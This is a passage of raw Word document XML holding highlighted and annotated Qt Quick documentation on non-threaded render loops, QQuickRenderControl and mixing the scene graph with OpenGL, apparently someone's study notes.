      <w:r w:rsidR="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D4D27" w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What is purpose?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="0011590B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1642" w:name="non-threaded-render-loops-basic-and-wind"/>
      <w:bookmarkStart w:id="1643" w:name="_Toc483000887"/>
      <w:bookmarkStart w:id="1644" w:name="_Toc483003878"/>
      <w:bookmarkStart w:id="1645" w:name="_Toc483604231"/>
      <w:bookmarkStart w:id="1646" w:name="_Toc483605451"/>
      <w:bookmarkEnd w:id="1642"/>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Non-threaded Render Loops ("basic" and "windows")</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1643"/>
      <w:bookmarkEnd w:id="1644"/>
      <w:bookmarkEnd w:id="1645"/>
      <w:bookmarkEnd w:id="1646"/>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non-threaded render loop is </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>currently used by default on Windows with ANGLE</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-default opengl32 implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux with Mesa drivers</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For the latter this is mostly a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>precautionary</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> measure, as not all combinations of OpenGL drivers and windowing systems have been tested. At the same time implementations like </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ANGLE or Mesa llvmpipe are not able to function properly with threaded rendering at all</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so not using threaded rendering is essential for these.</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By </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is used for non-threaded rendering on </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ANGLE</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, while</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>basic</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is used for </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all other platforms</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when non-threaded rendering is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="0011590B" w:rsidRDefault="001113FB" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Even when using the non-threaded render loop, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you should write your code as if you are using the threaded renderer</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as failing to do so will make the code </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-portable</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0011590B" w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="002D4D27" w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu examples?</w:t>
      </w:r>
      <w:r w:rsidR="0011590B" w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>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following is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplified illustration of the frame rendering sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the non-threaded renderer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00BD2950">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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg"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"http://doc.qt.io/qt-5/images/sg-renderloop-singlethreaded.jpg" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1043" type="#_x0000_t75" alt="" style="width:294.9pt;height:597.9pt">
            <v:imagedata r:id="rId2022" r:href="rId2023"/>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00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00E63735">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1647" w:name="custom-control-over-rendering-with-qquic"/>
      <w:bookmarkStart w:id="1648" w:name="_Toc483000888"/>
      <w:bookmarkStart w:id="1649" w:name="_Toc483003879"/>
      <w:bookmarkStart w:id="1650" w:name="_Toc483604232"/>
      <w:bookmarkStart w:id="1651" w:name="_Toc483605452"/>
      <w:bookmarkEnd w:id="1647"/>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Custom control over rendering with QQuickRenderControl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1648"/>
      <w:bookmarkEnd w:id="1649"/>
      <w:bookmarkEnd w:id="1650"/>
      <w:bookmarkEnd w:id="1651"/>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When using</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2024" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickRenderControl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>responsibility for driving the rendering loop is transferred to the application</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In this case </w:t>
      </w:r>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no built-in render loop is used</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Instead, it is up to the application to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the polish, synchronize and rendering </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>steps</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>appropriate time</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possible</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>either</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> behavior similar to the ones shown above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00E63735">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1652" w:name="mixing-scene-graph-and-opengl"/>
      <w:bookmarkStart w:id="1653" w:name="_Toc483000889"/>
      <w:bookmarkStart w:id="1654" w:name="_Toc483003880"/>
      <w:bookmarkStart w:id="1655" w:name="_Toc483604233"/>
      <w:bookmarkStart w:id="1656" w:name="_Toc483605453"/>
      <w:bookmarkEnd w:id="1652"/>
      <w:r w:rsidRPr="00E63735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mixing Scene Graph and OpenGL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1653"/>
      <w:bookmarkEnd w:id="1654"/>
      <w:bookmarkEnd w:id="1655"/>
      <w:bookmarkEnd w:id="1656"/>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scene graph offers </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD2950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
